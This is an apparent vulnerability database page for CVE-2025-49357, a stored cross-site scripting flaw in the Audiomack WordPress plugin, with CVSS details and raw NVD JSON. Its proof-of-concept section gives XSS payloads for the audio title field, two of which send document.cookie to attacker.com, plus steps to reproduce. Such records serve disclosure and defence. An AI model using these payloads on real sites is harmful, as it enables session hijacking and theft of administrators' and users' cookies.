Security Vulnerability Report
中文
CVE-2025-49357 CVSS 6.5 MEDIUM

CVE-2025-49357

Published: 2025-12-31 13:15:40
Last Modified: 2026-04-23 15:31:32

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in audiomack Audiomack audiomack allows Stored XSS.This issue affects Audiomack: from n/a through <= 1.4.8.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Audiomack WordPress Plugin < 1.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-49357 Stored XSS PoC --> <!-- Inject this payload in the 'audio title' field when uploading audio via Audiomack plugin --> <script>alert(document.cookie)</script> <!-- Alternative payload using event handler --> <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> <!-- jQuery-based payload for session hijacking --> <script>$.get('https://attacker.com/log?data='+btoa(document.cookie))</script> <!-- Steps to reproduce: --> <!-- 1. Login to WordPress with low-privilege user account --> <!-- 2. Navigate to Audiomack plugin audio upload section --> <!-- 3. Enter the XSS payload in the audio title field --> <!-- 4. Submit the form to save the audio --> <!-- 5. When admin or other users view the audio, the script executes -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49357", "sourceIdentifier": "[email protected]", "published": "2025-12-31T13:15:40.377", "lastModified": "2026-04-23T15:31:31.647", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in audiomack Audiomack audiomack allows Stored XSS.This issue affects Audiomack: from n/a through <= 1.4.8."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Audiomack permite XSS Almacenado. Este problema afecta a Audiomack: desde n/d hasta 1.4.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/audiomack/vulnerability/wordpress-audiomack-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}